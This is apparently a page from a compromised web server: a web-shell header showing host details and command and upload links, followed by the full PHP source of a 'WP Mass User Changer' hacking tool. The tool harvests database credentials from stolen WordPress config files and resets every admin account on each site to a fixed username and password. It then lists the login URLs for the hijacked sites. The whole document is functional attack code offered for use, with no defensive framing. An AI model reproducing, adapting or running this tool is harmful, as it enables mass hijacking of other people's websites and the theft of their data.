Server IP : 2a02:4780:11:1361:0:bf7:7935:10 / Your IP : 18.188.124.221 Web Server : LiteSpeed System : Linux in-mum-web1261.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u200767797 ( 200767797) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u200767797/domains/socon.in/../kamdhenutravels.com/../vcafamilysalon.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<html> <head> <title>WP Mass By 3rr0r Hun73r</title> </head> <style type="text/css"> @import 'https://fonts.googleapis.com/css?family=Iceland'; html,body{ background: black; padding: 0; direction: ltr; margin: 0; } h1{ color:#16a085; text-shadow:0 0 5px; font-family: Iceland; } #gter{ position: absolute; top: 0; width: 100%; text-align: center; background: black; color:#fff; padding-top: 10px; padding-bottom: 10px; font-family: Iceland; margin-bottom:20px; } #gter span{ color:white; font-size: 18px; text-shadow: :0px 0px 15px #00ffff; } .f{ color:white; font-family: Iceland; text-shadow: 0 0 15px #00ffff; font-size: 21px; } a{ font-family: Iceland; text-decoration: none; color:white; text-shadow:0 0 15px #00ff00; } form{ margin-top: 120px; } input[type=submit]{ font-size:20px; height: 30px; width: 165px; border: 2px solid red; color: yellow; background-color: black; font-family: Iceland; } input[type=submit]:hover{ box-shadow: 0 0 2px #ff0000; } input[type=text]{ font-family:Iceland; width: 450px; height: 30px; color: red; background: #000000; border: 1px solid #00ff00; padding: 5px; text-align: center; font-size:20px; } input[type=text]:focus{ box-shadow: 0 0 3px #ff0000; } .heading{ color:white; font-size:50px; margin-top: 60px; margin-bottom: -110px; font-family:Iceland; text-shadow:0px 0px 20px red; } </style> </head> <body> <center> <center><p class="heading">WP Mass User Changer by 3rr0r Hun73r</p></center> <br /><br /> <form method="post"> <input type="text" name="config" placeholder="Config URL Here"> <br><br> <input type="submit" name="ch" value="Change Admin"> </form> </center> <?php set_time_limit(0); error_reporting(0); if($_POST['ch']){ $get2 = file_get_contents($_POST['config']); preg_match_all('#<a href="(.*?)"#', $get2, $config); foreach($config[1] as $don){ $get = file_get_contents($_POST['config']."/".$don); preg_match_all("#'DB_HOST', '(.*?)'#", $get, $host); foreach($host[1] as $don){ $host = $don; } preg_match_all("#'DB_PASSWORD', '(.*?)'#", $get, $pass); foreach($pass[1] as $done){ $password = $done; } preg_match_all("#'DB_USER', '(.*?)'#", $get, $user); foreach($user[1] as $done1){ $user = $done1; } preg_match_all("#'DB_NAME', '(.*?)'#", $get, $name); foreach($name[1] as $done2){ $name = $done2; } preg_match_all("#$table_prefix = '(.*?)'#", $get, $prefix); foreach($prefix[1] as $done3){ $prefix = $done3; } $connect = mysqli_connect($host,$user,$password,$name); if($connect){ $query1 = mysqli_query($connect,"select * from ".$prefix."options where option_name='siteurl'"); while($siteurl = mysqli_fetch_array($query1)){ $site_url = $siteurl['option_value']; } $query2 = mysqli_query($connect,"update ".$prefix."users set user_login='admin',user_pass='e4280d0804461c91c95069aba8bf57f3'"); if($query2){ echo "<center><span class=f>URL : <a href='$site_url/wp-login.php' target='_blank'>$site_url/wp-login.php</a><br><br>UserName : admin<br><br>Password : rbbd95<br><br></span></center>"; } } } } ?> </body> </html>